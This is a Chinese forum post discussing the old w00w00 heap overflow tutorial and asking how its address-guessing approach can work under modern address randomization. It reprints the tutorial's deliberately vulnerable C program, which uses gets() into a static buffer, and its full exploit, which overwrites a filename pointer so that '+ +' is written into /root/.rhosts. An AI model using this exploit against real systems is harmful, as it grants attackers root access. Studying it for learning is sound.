这是一个很老的关于heap overflow开山鼻祖型的文章,w00w00 on Heap Overflows
http://www.w00w00.org/files/articles/heaptut.txt
这篇文章应该算是最早系统的讲解heap区溢出的大作了吧。
但里面一些东西现在已经不可用了。例如overflow缺陷程序的参数,将"+ +\t#"写入.rhosts那个例子。
那个例子假设被攻击程序和攻击程序栈堆的基地址是相同的。从而猜测被攻击程序argv[1]可能的地址,用argv[1]的内容去覆盖原始的文件名,达到将要写入的文件名改为argv[1]指定的文件名的目的。
但现在程序运行其堆栈基地址一直在变化,没法很快的猜测出来了,这种情况下如何较准确的命中呢?
文中有漏洞程序
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#define ERROR -1
#define BUFSIZE 16
int main(int argc, char **argv)
{
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
if (argc <= 1)
{
fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
exit(ERROR);
}
tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
printf("before: tmpfile = %s\n", tmpfile);
printf("Enter one line of data to put in %s: ", tmpfile);
gets(buf);
printf("\nafter: tmpfile = %s\n", tmpfile);
tmpfd = fopen(tmpfile, "w");
if (tmpfd == NULL)
{
fprintf(stderr, "error opening %s: %s\n", tmpfile,
strerror(errno));
exit(ERROR);
}
fputs(buf, tmpfd);
fclose(tmpfd);
}
溢出程序
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */
/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}
int main(int argc, char **argv)
{
u_long addr;
register int i;
int mainbufsize;
char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";
/* ------------------------------------------------------ */
if (argc <= 1)
{
fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
exit(ERROR);
}
/* ------------------------------------------------------ */
memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");
memset(buf + strlen(buf), 'A', DIFF);
addr = getesp() + atoi(argv[1]);
/* reverse byte order (on a little endian system) */
for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;
mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbufsize));
snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
buf, VULPROG, VULFILE);
printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
addr, VULFILE);
system(mainbuf);
return 0;
}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)